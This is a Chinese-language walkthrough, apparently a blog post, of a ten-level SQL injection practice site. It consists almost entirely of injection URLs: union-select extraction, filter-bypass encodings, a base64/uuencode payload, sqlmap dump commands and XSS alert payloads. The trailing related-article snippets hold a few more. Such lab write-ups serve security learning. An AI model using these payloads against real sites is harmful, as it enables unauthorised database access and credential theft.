SQL Challenges靶机
http://www.zixem.altervista.org/SQLi/
第一关
http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=1--+
http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=2--+
http://www.zixem.altervista.org/SQLi/level1.php?id=1 order by 4--+
http://www.zixem.altervista.org/SQLi/level1.php?id=1%20order%20by%203--+
http://www.zixem.altervista.org/SQLi/level1.php?id=-1%20union%20select%201,2,3--+
sqlmap -u "注入点" --dbs
sqlmap -u "注入点" -D xx --tables
sqlmap -u "注入点" -D XX -T XX --columns
sqlmap -u "注入点" -D XX -T XX -C XX --dump
sqlmap -u "注入点" --users
sqlmap -u "注入点" --passwords
xss
http://www.zixem.altervista.org/SQLi/level1.php?id=%3CScRiPt%3Ealert(1)%3C/sCrIpT%3E
第二关
http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20and%201=1--+
http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20and%201=2--+
http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20order%20by%205--+
http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20order%20by%204--+
http://www.zixem.altervista.org/SQLi/level2.php?showprofile=-4%27%20union%20select%201,2,3,4--+
http://www.zixem.altervista.org/SQLi/level2.php?showprofile=-4' union select 1,database(),3,4--+
第三关
http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20and%201=1--+
http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20and%201=2--+
http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20order%20by%205--+
http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20order%20by%204--+
http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20union%20select%201,2,3,4--+
http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20unionon%20select%201,2,3,4--+
http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20unionon%20select%201,database(),3,4--+
第四关
http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20and%201=1--+
http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20and%201=2--+
http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20order%20by%205--+
m.altervista.org/SQLi/level4.php?ebookid=7' order by 6--+
http://www.zixem.altervista.org/SQLi/level4.php?ebookid=-1%27%20union%20select%201,2,3,4,5--+
http://www.zixem.altervista.org/SQLi/level4.php?ebookid=-1%27%20union%20select%201,database(),3,4,5--+
第五关
http://www.zixem.altervista.org/SQLi/login_lvl5.php
http://www.zixem.altervista.org/SQLi/md5cracker.php?hash=d1fd6ef9af6cb677e09b1b0a68301e0c
第六关
http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20and%201=1--+
http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20and%201=2--+
http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20order%20by%205--+
http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20order%20by%204--+
sqlmap 跑盲注
第七关
http://www.zixem.altervista.org/SQLi/level7.php?id=1%20and%201=1--+
http://www.zixem.altervista.org/SQLi/level7.php?id=1%20and%201=2--+
http://www.zixem.altervista.org/SQLi/level7.php?id=1%20order%20by%203--+
http://www.zixem.altervista.org/SQLi/level7.php?id=1%20order%20by4--+
http://www.zixem.altervista.org/SQLi/level7.php?id=-1+union+select+1,2,3--+
http://www.zixem.altervista.org/SQLi/level7.php?id=-1+UNION+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3--+
第八关
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1\
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27%20and%201=1--+
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27/**/and/**/1=1--+
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%20and%201=1
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1' and '1'='1--+
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1'/**/and/**/1=1--+
特殊字符绕过
A plus sign (+)
A simple URL encoded space (%20)
A null byte (%00)
A newline (%0a)
A tab (%09)
A carriage return (%0d)
构造poc
空格%20
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%20and%201=1
空字节%00
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%00and%001=1--+
换行\n %0a
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0aand%0a1=1--+
回车%0d
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0dsand%0d1=1--+
Tab %09
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=1--+
Tab %09
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=1--+
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=2--+
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09order%09by%093--
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09union%09select%091,2,3--
大小写
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09union%09sSelECT%091,2,3--
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09/*!SeLECt*/%091,2,3--
url加密
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%2509union%2509select%25091,2,3--%20
使用特殊字符 *
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09sel*ect%091,2,3--
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09se/**/lect%091,2,3--
关键词替换
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09SEselectLECT%091,2,3--
http://www.zixem.altervista.org/SQLi/lvl8.php?id=2%09UNION%09ALL%09SELSELECTECT%091,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3--
第九关
http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' and 1=1--
http://www.zixem.altervista.org/SQLi/lvl9.php?id=1%27%20and%201=2--+
http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' order by 2--+
http://www.zixem.altervista.org/SQLi/lvl9.php?id=1%27%20order%20by%203--+
http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' union select 1,2--+
http://www.zixem.altervista.org/SQLi/lvl9.php?id=1 and 1=2' union select "../etc/passwd","2"--+
第十关
http://www.zixem.altervista.org/SQLi/lvl10.php?x=ISwwYGAKYAo=
构造编码
1 AND 1=2 UNION SELECT 1,2--
使用Uuencode decoder 进行解码
<,2!!3D0@,3TR(%5.24].(%-%3$5#5"`Q+#(M+0```
base64加密
PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo=
http://www.zixem.altervista.org/SQLi/lvl10.php?x=PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo=
构造注入语句
1 AND 1=2 UNION SELECT 1,CONCAT(user()," ",version())--
结果
M,2!!3D0@,3TR(%5.24].(%-%3$5#5"`Q+$-/3D-!5"AU<V5R*"DL(B`B+'9E*<G-I;VXH*2DM+0```
64编码
TSwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyQtLzNELSE1IkFVPFY1UioiREwoQmBCKyc5RQoqPEctSTtWWEgqMkRNKzBgYApg
http://www.zixem.altervista.org/SQLi/lvl10.php?x=TSwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyQtLzNELSE1IkFVPFY1UioiREwoQmBCKyc5RQoqPEctSTtWWEgqMkRNKzBgYApg
参考文档 https://www.cnblogs.com/hack404/p/10387894.html
SQL Challenges靶机的更多相关文章
- SQL Challenges
平台: http://www.zixem.altervista.org/SQLi/ Level 1 (Super Easy) http://www.zixem.altervista.org/SQLi/ ...
- XSS challenges靶机
第一关 <script>alert(123)</script> "><svg onload=alert(123)> 第二关 <script&g ...
- web 攻击靶机解题过程
sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...
- 【新手篇】搭建DCN漏洞靶机及简单的SQL手工注入
很多新手小白入门后发现想要学好“网安”技术,除了掌握基础理论知识,更需要经常模拟不同的漏洞环境,但是如果使用外网服务器练习,会存在一定风险,因此能够搭建一个本地的模拟环境去测试漏洞将是一个不错的方案. ...
- DVWA靶机-sql自动注入
1. 使用dvwa靶机进行sql注入实战(注:当前靶机安全级别为low) 打开sql漏洞,发现输入不同的数字会返回不同的信息, 先尝试手工判断是否存在sql注入 一般sql注入语句像这样,我们构造的是 ...
- SQL注入测试平台 SQLol -6.CHALLENGES挑战
SQLol上面的挑战共有14关,接下来我们一关一关来突破. Challenge 0 目的是让查询返回所有的用户名,而不是只有一个. SELECT username FROM users WHERE u ...
- DC靶机1-9合集
DC1 文章前提概述 本文介绍DC-1靶机的渗透测试流程 涉及知识点(比较基础): nmap扫描网段端口服务 msf的漏洞搜索 drupal7的命令执行利用 netcat反向shell mysql的基 ...
- DC-1 靶机渗透
DC-1 靶机渗透 *概况*: 下载地址 https://www.vulnhub.com/entry/dc-1,292/ *官方描述:* DC-1 is a purposely built vulne ...
- sql注入学习小结
/* 转载请注明出处,By:珍惜少年时 小知识,只是放在博客吃饭时无聊看看,大牛勿喷. */ 珍惜少年时博客,专注网络安全 web渗透测试 00x1爆所有库: mysql> select sch ...
随机推荐
- Django(69)最好用的过滤器插件Django-filter
前言 如果需要满足前端各种筛选条件查询,我们使用drf自带的会比较麻烦,比如查询书名中包含"国"字,日期大于"2020-1-1"等等诸如此类的请求,Djan ...
- 『心善渊』Selenium3.0基础 — 4、Selenium基础元素定位详解
目录 1.什么是元素定位 2.Selenium元素定位常用API (1)By_id 定位 (2)by_name 定位 (3)by_class_name 定位 (4)by_tag_name 定位 (5) ...
- asp.net core 实现 face recognition 使用 tensorflowjs(源代码)
功能描述 上传照片文件名及是系统要识别标签或是照片的名称(人物标识) 提取照片脸部特征值(调用 facemesh模型) 保存特征值添加样本(调用 knnClassifier) 测试上传的图片是否识别正 ...
- Golang去除字符串前后空格
Golang去除字符串前后空格 实现Demo package main import "fmt" func DeletePreAndSufSpace(str string) str ...
- 精尽Spring Boot源码分析 - 文章导读
该系列文章是笔者在学习 Spring Boot 过程中总结下来的,里面涉及到相关源码,可能对读者不太友好,请结合我的源码注释 Spring Boot 源码分析 GitHub 地址 进行阅读 Sprin ...
- 精尽Spring Boot源码分析 - 内嵌Tomcat容器的实现
该系列文章是笔者在学习 Spring Boot 过程中总结下来的,里面涉及到相关源码,可能对读者不太友好,请结合我的源码注释 Spring Boot 源码分析 GitHub 地址 进行阅读 Sprin ...
- Pytest学习笔记8-参数化
前言 我们在实际自动化测试中,某些测试用例是无法通过一组测试数据来达到验证效果的,所以需要通过参数化来传递多组数据 在unittest中,我们可以使用第三方库parameterized来对数据进行参数 ...
- 深入学习Netty(1)——传统BIO编程
前言 之前看过Dubbo源码,Nacos等源码都涉及到了Netty,虽然遇到的时候查查资料,后面自己也有私下学习Netty并实践,但始终没有形成良好的知识体系,Netty对想要在Java开发上不断深入 ...
- 16、编译安装ansible
16.1.python版本说明: Ansible是一种批量部署工具,现在运维人员用的最多的三种开源集中化管理工具有:puppet,saltstack,ansible,各有各的优缺点, 其中saltst ...
- gitlab 设置tag保护及取消tag保护功能
用gitlab管理员登录系统 进入项目->设置->Repository 设置项目的Tag保护 效果展示 取消Tag保护 效果展示